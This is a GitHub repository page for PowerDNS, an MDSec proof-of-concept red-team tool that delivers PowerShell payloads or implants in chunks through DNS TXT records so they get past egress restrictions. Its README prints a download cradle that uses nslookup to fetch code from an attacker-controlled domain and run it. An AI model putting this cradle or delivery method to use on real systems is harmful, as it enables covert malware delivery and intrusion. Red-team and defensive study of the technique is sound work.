Skip to content
PowerDNS: Powershell DNS Delivery
Branch: master
Clone or download
mdsecactivebreach Merge pull request #2 from byt3bl33d3r/master
Fixed error when recv packets without UDP layer
Latest commit ed9fae3 Oct 13, 2017
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md Update README Jul 13, 2017
powerdns.py Im dumb Oct 6, 2017

README.md

___                        ___  _ _  ___
| . \ ___  _ _ _  ___  _ _ | . \| \ |/ __>
|  _// . \| | | |/ ._>| '_>| | ||   |\__ \
|_|  \___/|__/_/ \___.|_|  |___/|_\_|<___/

@domchell, MDSec ActiveBreach

Description

PowerDNS is a simple proof of concept to demonstrate the execution of PowerShell script using DNS only.

PowerDNS works by splitting the PowerShell script in to chunks and serving it to the user via DNS TXT records.

Use cases for PowerDNS include delivery of an implant using PowerShell DNS delivery, or where you may need to introduce a PowerShell script to a tightly controlled environment where egress is limited only to DNS.

Usage:

In order to use PowerDNS, the powerdns.py server should run on the host that is authoritative for a given domain.

PowerDNS takes the file to serve, along with the domain that the server is authoritative for as arguments:

# python powerdns.py -h
___                        ___  _ _  ___
| . \ ___  _ _ _  ___  _ _ | . \| \ |/ __>
|  _// . \| | | |/ ._>| '_>| | ||   |\__ \
|_|  \___/|__/_/ \___.|_|  |___/|_\_|<___/

@domchell, MDSec ActiveBreach

usage: powerdns.py [-h] [--file <file>] [--domain <domain>]

optional arguments:
  -h, --help         show this help message and exit
  --file <file>      PowerShell file to serve
  --domain <domain>  Domain with auth NS record

Example:

The following example will serve the psh_payload.ps1 file and can be executed on the target host using the supplied download cradle:

# python powerdns.py --file psh_payload.ps1 --domain foobar.com
___                        ___  _ _  ___
| . \ ___  _ _ _  ___  _ _ | . \| \ |/ __>
|  _// . \| | | |/ ._>| '_>| | ||   |\__ \
|_|  \___/|__/_/ \___.|_|  |___/|_\_|<___/

@domchell, MDSec ActiveBreach

[*] PowerDNS: Splitting psh_payload.ps1 in to 18 chunk(s)
[*] PowerDNS: Use the following download cradle:
[*] PowerDNS: powershell "powershell (nslookup -q=txt -timeout=5 0.foobar.com)[-1]"

You can’t perform that action at this time.